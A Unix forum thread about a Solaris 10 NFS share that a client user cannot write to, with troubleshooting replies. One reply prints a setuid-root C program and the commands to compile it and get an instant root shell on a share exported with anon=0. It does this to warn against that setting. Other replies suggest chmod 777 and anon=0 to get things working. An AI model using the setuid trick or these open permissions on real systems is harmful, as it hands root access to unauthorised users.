Today (Saturday) We will make some minor tuning adjustments to MySQL.

You may experience 2 up to 10 seconds "glitch time" when we restart MySQL. We expect to make these adjustments around 1AM Eastern Daylight Saving Time (EDT) US.


Unable to write to a mounted NFS share


 
Thread Tools Search this Thread
# 1  
Unable to write to a mounted NFS share

Hi All,

I created a nfs share in the server(Solaris 10) with the following command and also updated the dfstab file

share -F nfs -o rw=server_name2,anon=0 /to_share

And then in the client(solaris 10) added the following command to mount the share

mount -F nfs server_name1:/to_share /shared_by


In the client ,I changed the owner of the mount directory and all the files in it to another user (oracle)
But it doesn't allow oracle to modify the file or create a new file in the dir.

Please let me know if I need to change any option.

Thanks
# 2  
What you've done seems to me like it should work. Nothing jumps out at me as being incorrect. It could be a permissions issue; perhaps not.

What I would do is to get it working first by opening up security if it's not too big a risk for the site, and then close things down step by step checking it still works.

Here's what I would do in your position...........

1. Are you sure that the shared directory on the server allows writing permission to that client? To be sure set the actual shared directory rights to 777. Does it work now?

2. When the server receives an in-bound connection request it only has the clients ip address. Can the server resolve that to the client name that you have given in your share command? Ensure that client (and its ip address) appears in /etc/hosts or can be resolved through DNS. If not, the server doesn't know who's who.

(On the server, if you

Code:
# ping <client name>

Do you get the correct response? Is the client name resolved to the correct ip address?)

Does it work now?

3. Try changing your share command to:

Code:
share -F nfs -o rw,root=server_name2 /to_share

to give the in-bound connection root permissions on the server. (You can also omit the anon=0, it's a "catch all" for unidentified users.)

Does it work now?

Remember that you may need to re-issue the server share, and re-issue the client NFS mount to test it.

Hope that helps.

Do please post back your progress. There's other things to try. There's loads of expertise on this forum to help you, be assured of that.

If you can take the security risk, get it working first at any cost and then tighten up afterwards. If you can't take that risk, let us know.

Last edited by hicksd8; 09-15-2014 at 04:37 PM..
This User Gave Thanks to hicksd8 For This Post:
# 3  
Hi ,

Thank you mfor your most detailed answer and it solved my problem when I used
root=server_name2
But somehow I had to use

anon=0 too without which it didn't allow the user to create any file in the dir.

Thanks again.
# 4  
Using "anon=0" is about as dangerous to security as you can possibly imagine.

What "anon=0" means is, "If I don't know who you are, I'm giving you root permissions in the file system." If you need to do THAT, something is badly broken in your configuration. BADLY BROKEN.

Create this file in that NFS file system on an NFS client as a user that's not recognized by the NFS server:
crack.c:
Code:
#include <unistd.h>
int main( int argc, char **argv )
{
    setuid( 0 );
    seteuid( 0 );
    setgid( 0 );
    setegid( 0 );
    execv( argv[ 1 ], argv + 1 );
}

Now run these commands:
Code:
cc crack.c -o crack
chmod 4755 crack

Then run something like this from any host mounting that file system - as any user - whether it's mounted natively or via NFS:
Code:
crack /bin/bash

Instant root shell, goodbye security.
# 5  
Having to use
Code:
anon=0

is telling you that
Code:
rw,root=<client name>

is not sufficient to identify the client. See note 2 in my post#2.

Did you put (previously created) files in the share directory on the server? If so, what security mask is on them? You may have set the parent share directory to 777, but what about the files below?

Yes, as I recommended you got it working "at any cost" but you now need to consider the security level you are going to run with.

As already pointed out by Achenle, using anon=0 gives root access to all unidentified users. It all depends whether you can risk that.
 

|
Thread Tools Search this Thread
Search this Thread:
Advanced Search

More UNIX and Linux Forum Topics You Might Find Helpful
Unable to mount previously-working NFS share from NIM to LPAR
tmooredba
Right, now that I've finally worked out this website, I'll ask my question! I am having an absolute nightmare with NFS on AIX. I have used it many times, and I know what I'm doing, however I cannot fathom what is going on here. I have 2 LPARs, sitting on the same physical host. They are...... AIX
12
AIX
Unable to search NFS Share
jgt
My customer has created a share on a Windows Server 2012 system and exported it as a NFS share. I can mount the share on a SCO system, but I only have read/write access. So I am unable to list the contents of the share. It is as if the directories had 0666 permissions. My customer says that this...... IP Networking
5
IP Networking
Unable to write to NFS mounted directory
anaigini45
Hi, I have exported a few nfs mounts from one server to the nfs clients. This is my nfs server dfstab : # cat /etc/dfs/dfstab # place share(1M) commands here for automatic execution # on entering init state 3. # # share <pathname> # .e.g, # share -F...... HP-UX
3
HP-UX
NFS mounted drive showing Write protected message
rakeshkumar
Hi We have two servers name A and B . I have a folder "Share" on A was NFS mounted to "B" server. I have set the ACL permissions using setfacl , so that both (One user from Server A and another user from Server B) users can read and write to the directory. Both users can create the...... UNIX for Dummies Questions & Answers
0
UNIX for Dummies Questions & Answers
Unable to mount NFS share during boot
jlslhills
Hello Everyone, I have a pseries machine running AIX 4.3.3 that has an invalid IP in /etc/hosts. During a boot the system hangs because it's trying to mount an NFS share to this invalid IP. I've tried to boot the system from a mksysb (not sure if the device was defined as rmt0) and AIX CD...... AIX
0
AIX

Featured Tech Videos